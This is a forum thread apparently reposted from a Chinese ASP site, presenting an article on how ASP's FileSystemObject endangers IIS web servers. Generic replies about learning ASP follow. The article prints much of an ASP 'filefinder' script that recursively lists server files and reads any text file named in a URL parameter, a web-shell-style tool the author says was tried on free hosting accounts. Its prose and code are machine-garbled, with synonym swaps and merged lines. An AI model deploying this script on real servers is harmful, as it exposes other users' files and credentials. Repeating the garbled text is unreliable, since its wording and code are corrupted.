仓酷云
标题:
ASP网站制作之ASP中FSO工具对IIS WEB服务器数据平安的...
[打印本页]
作者:
谁可相欹
时间:
2015-1-16 22:57
标题:
ASP网站制作之ASP中FSO工具对IIS WEB服务器数据平安的...
缺点:正版成本价格贵(盗版就不说了)、不够安全,大多数服务器用windows系统,没有linux安全fso|iis|web|web服务|web服务器|平安|工具|数据scripting.filesystemobject工具是由scrrun.dll供应的很多供vbscript/jscript把持的com工具之一。scripting.filesystemobject供应了十分便当的文本文件和文件目次的会见,可是同时也对iisweb服务器数据平安形成了必定的威逼。
filefinder的代码很复杂,由3个函数和30行摆布的按次代码组成。
最关头的是findfiles函数,经由过程对它的递回挪用完成对某个目次的遍历,而且依照特定的文件扩大名来征采这些文件。
functionfindfiles(strstartfolder,strext)
dimn
dimothisfolder
dimofolders
dimofiles
dimofolder
dimofile
假如体系办理员对文件体系的权限举行仔细的设置话,上面的代码就要堕落
可是有些目次仍是能够观察的,以是我们复杂的把毛病疏忽已往
onerrorresumenext
n=0
response.write"<b>searching"&strstartfolder&"</b><br>"
setothisfolder=g_fs.getfolder(strstartfolder)
setofiles=othisfolder.files
foreachofileinofiles
假如是指定的文件扩大名,输入毗连导向自己,但用分歧的命令cmd
在这里是cmd=read,即读出指定物理路径的文本文件
ifissuffix(ofile.path,strext)then
response.write"<atarget=_blankhref=ff.asp?cmd=read&path="&server.htmlencode(ofile.path)&"><fontcolor=dodgerblue>"&ofile.path&"</font></a><br>"
iferr=0then
n=n+1
endif
endif
next
setofolders=othisfolder.subfolders
foreachofolderinofolders
n=n+findfiles(ofolder.path,strext)
next
findfiles=n
endfunction
上面的代码是对url前面的参数举行剖析:
读出各个参数的值
strcmd=ucase(request.querystring("cmd"))
strpath=request.querystring("path")
strext=request.querystring("ext")
brawdata=ucase(request.querystring("raw"))
默许搜刮.asp文件
ifstrpath=""then
strpath="."
endif
ifstrext=""then
strext=".asp"
endif
依据分歧的命令cmd实行分歧的代码
selectcasestrcmd
case"find"
response.writefindfiles(strpath,strext)&"file(s)found"
case"read"
ifbrawdata="t"then
response.writereadtextfile(strpath)
else
response.write"<pre>"&server.htmlencode(readtextfile(strpath))&"</pre>"
endif
caseelse
response.write"<h3>pleasespecifyacommandtoexecute</h3>"
endselect
从下面的剖析能够看出,假如有充足的权限的话,我们就能够经由过程filefinder来查找iisweb服务器上的恣意文本文件,而且能够轻松的观察文件内容。关于非文本文件,能够断定他们是不是存在及其地点路径,这关于初级hacker们来讲,这些信息偶然是极为主要的。
可是这些对数据平安的威逼的条件前提是实行ff.asp的用户最少具有读取目次和文件的权限。因为windowsntserver在安装后的默许平安设置是一切用户都能够“读取”目次和文件,以是不论是iis默许的你名用户iusr_servername仍是其余甚么用户,都能够顺列的读取目次和文件的信息。而年夜多半windowsntserver体系办理员次要体贴体系是不是可以运转的起来,一样平常不肯意往修改默许的目次和文件权限,究竟那样做要冒很年夜的风险,并且必要良多次得履历。以是,我们能够用filefinder来反省作为web服务器的ntserver的文件体系的平安设置是不是平安。
作者专门对作为iisweb服务器的文件体系的权限举行了野生设置,但限于没有履历,招致了很多奇异的毛病征象,如:所用的做实行的ntserver4.0不克不及举行access数据库的毗连。而在举行文件体系权限修改之前,这些功效是一般的。
本着地道研讨的目标,作者还在我所请求的收费asp空间上作了实验(包含csdn供应的我的团体主页),了局是filefinder都能够顺遂运转。而在http://www2.domaindlx.com/index.html请求的团体主页却没有这个成绩,可见这个收费asp主页供应商在这方面做的仍是对照仔细的。只管domaindlx的web服务器运转在windows2000server上的,其默许的文件体系的平安权限和nt4.0没有很年夜的不同。
因为作者的才能无限,就对这个成绩会商到这里。仅以此文来向国际的asp主页供应商供应参考定见,但愿能对供应商和客户两边的数据平安都有所匡助。
附:用别的相似的服务器端剧本来运转的web服务,假如也供应相似scripting.filesystemobject的对文件体系操纵的功效,不论甚么平台应当存在一样的成绩。
</p>由于ASP还是一种Script语言所没除了大量使用组件外,没有办法提高其工作效率。它必须面对即时编绎的时间考验,同时我们还不知其背后的组件会是一个什么样的状况;
作者:
谁可相欹
时间:
2015-1-20 06:24
我认为比较好的方法是找一些比较经典的例子,每个例子比较集中一种编程思想而设计的。
作者:
愤怒的大鸟
时间:
2015-1-21 16:22
作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。
作者:
小魔女
时间:
2015-1-25 13:32
多看多学多思。多看一些关于ASP的书籍,一方面可以扩展知识面一方面可以鉴借别人是如何掌握、运用ASP的;多学善于关注别人,向同学老师多多学习,不论知识的大小;多思则是要将学到的知识灵活运用。
作者:
若相依
时间:
2015-1-29 15:29
ASP.Net摆脱了以前ASP使用脚本语言来编程的缺点,理论上可以使用任何编程语言包括C++,VB,JS等等,当然,最合适的编程语言还是MS为.NetFrmaework专门推出的C(读csharp),它可以看作是VC和Java的混合体吧。
作者:
若天明
时间:
2015-1-30 12:13
Request:从字面上讲就是“请求”,因此这个是处理客户端提交的东东的,例如Resuest.Form,Request.QueryString,或者干脆Request("变量名")
作者:
山那边是海
时间:
2015-2-6 11:23
用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。
作者:
爱飞
时间:
2015-2-16 01:37
运用ASP可将VBscript、javascript等脚本语言嵌入到HTML中,便可快速完成网站的应用程序,无需编译,可在服务器端直接执行。容易编写,使用普通的文本编辑器编写,如记事本就可以完成。由脚本在服务器上而不是客户端运行,ASP所使用的脚本语言都在服务端上运行。
作者:
精灵巫婆
时间:
2015-3-4 21:50
从事这个行业,那么你可以学ASP语言,简单快速上手,熟练dreamweav排版,写asp代码,熟练photoshop处理图片,打好基础就行了
作者:
乐观
时间:
2015-3-11 21:12
运用ASP可将VBscript、javascript等脚本语言嵌入到HTML中,便可快速完成网站的应用程序,无需编译,可在服务器端直接执行。容易编写,使用普通的文本编辑器编写,如记事本就可以完成。由脚本在服务器上而不是客户端运行,ASP所使用的脚本语言都在服务端上运行。
作者:
冷月葬花魂
时间:
2015-3-19 13:25
兴趣爱好,那么你无须学编程,申请一个域名和空间,在网上下载一些免费开源的CMS系统,你不用改代码,只须熟悉它们的后台操作,像office一样简单方便,很快就能建一个站点,很多站长都是这样做的
作者:
小女巫
时间:
2015-3-28 04:33
我就感觉到ASP和一些常用的数据库编程以及软件工程方面的思想是非常重要的。我现在也在尝试自己做网页,这其中就用到了ASP,我想它的作用是可想而知的。
欢迎光临 仓酷云 (http://ckuyun.com/)
Powered by Discuz! X3.2